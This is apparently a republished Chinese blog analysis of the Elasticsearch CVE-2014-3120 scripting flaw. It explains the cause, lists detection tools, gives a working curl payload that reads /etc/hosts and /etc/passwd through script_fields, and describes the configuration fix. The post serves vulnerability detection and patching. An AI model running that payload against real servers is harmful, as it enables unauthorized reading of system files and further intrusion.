zoukankan      html  css  js  c++  java
  • ElasticSearch远程随意代码运行漏洞(CVE-2014-3120)分析

    原理

    这个漏洞实际上非常easy,ElasticSearch有脚本运行(scripting)的功能,能够非常方便地对查询出来的数据再加工处理。

    ElasticSearch用的脚本引擎是MVEL,这个引擎没有做不论什么的防护,或者沙盒包装,所以直接能够运行随意代码。

    而在ElasticSearch里,默认配置是打开动态脚本功能的,因此用户能够直接通过http请求,运行随意代码。

    事实上官方是清楚这个漏洞的,在文档里有说明:

    First, you should not run Elasticsearch as the root user, as this would allow a script to access or do anything on your server, without limitations. Second, you should not expose Elasticsearch directly to users, but instead have a proxy application inbetween. 


    检測方法

    在线检測:

    http://tool.scanv.com/es.html          能够检測随意地址

    http://bouk.co/blog/elasticsearch-rce/poc.html   仅仅检測localhost。只是会输出/etc/hosts和/etc/passwd文件的内容到网页上

    自己手动检測:

    curl -XPOST 'http://localhost:9200/_search?

    pretty' -d ' { "size": 1, "query": { "filtered": { "query": { "match_all": {} } } }, "script_fields": { "/etc/hosts": { "script": "import java.util.*; import java.io.*; new Scanner(new File("/etc/hosts")).useDelimiter("\\Z").next();" }, "/etc/passwd": { "script": "import java.util.*; import java.io.*; new Scanner(new File("/etc/passwd")).useDelimiter("\\Z").next();" } } } '

    处理办法

    关掉运行脚本功能,在配置文件elasticsearch.yml里为每个结点都加上:

    script.disable_dynamic: true

    http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html#_disabling_dynamic_scripts

    官方会在1.2版本号默认关闭动态脚本。

    https://github.com/elasticsearch/elasticsearch/issues/5853

    參考:

    http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html

    http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/search-request-script-fields.html

    http://bouk.co/blog/elasticsearch-rce/

  • 相关阅读:
    汇编Ring 3下实现 HOOK API
    软件调试之INT 3讲解
    Delphi逆向
    XoftSpy 4.13的注册算法分析
    反调试技术揭秘
    jmp && call && ret 特权级转移 & 进程调度
    PHP Warning: Module 'modulename' already loaded in Unknown on line 0
    PhpStorm和PHPstudy配置调试参数(Xdebug),问题描述Error. Interpreter is not specified or invalid. Press “Fix” to edit your project configuration.
    php 安装xdebug进行调试(phpstorm)
    Windows下PHP多线程扩展pthreads的安装
  • 原文地址:https://www.cnblogs.com/jzssuanfa/p/6803338.html
Copyright © 2011-2022 走看看